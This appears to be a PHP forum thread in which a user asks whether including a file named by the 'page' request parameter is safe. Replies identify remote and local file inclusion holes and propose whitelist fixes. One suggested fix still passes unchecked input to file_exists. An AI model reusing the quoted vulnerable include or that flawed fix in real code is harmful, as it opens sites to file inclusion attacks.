Code: Select all
if (isset($_REQUEST["page"]))
{
include $_REQUEST["page"].".php";
}
if (isset($_REQUEST["logout"]))
{
include "logout.php";
}thanks
Moderator: General Moderators
Code: Select all
if (isset($_REQUEST["page"]))
{
include $_REQUEST["page"].".php";
}
if (isset($_REQUEST["logout"]))
{
include "logout.php";
}Code: Select all
if (isset($_REQUEST["page"]))
{
$page=$_REQUEST['page'];
if(file_exists("$path/$page.php"))
include "*/".$_REQUEST["page"].".php";
}
if (isset($_REQUEST["logout"]))
{
$logout=$_REQUEST['logout'];
if(file_exists("$path/$logout.php"))
include "logout.php";
}Code: Select all
<?php
/**
* $_GET['page'] pulls page from the URL querystring.
* $_POST['page'] pulls page from form post values.
* $_COOKIE['page'] pulls page from a cookie with key "page".
*
* KNOW where your data is coming from. (Don't use $_REQUEST)
*/
# Fetch page
$page = (isset($_GET['page'])) ? $_GET['page'] : '';
# Define absolute path
$absolute_path = '/var/www/';
# Include your page
switch($page)
{
case 'my_account':
include_once($absolute_path . 'my_account.php');
break;
case 'logout':
include_once($absolute_path . 'logout.php');
break;
default:
include_once($absolute_path . 'home.php');
break;
}
?>You have a remote file inclusion threat in your application, and a local file inclusion vulnerability. You can't trust any data the client sends you.vin_akleh wrote:well is it? if so what is the solution?Code: Select all
if (isset($_REQUEST["page"])) { include $_REQUEST["page"].".php"; } if (isset($_REQUEST["logout"])) { include "logout.php"; }
thanks
Code: Select all
$allowedPages = array('home','downloads','contact');
if (!in_array($_GET['page'], $allowedPages)) // Is the page allowed to be accessed?
$_GET['page'] = 'home';
include($_GET['page'].'.php');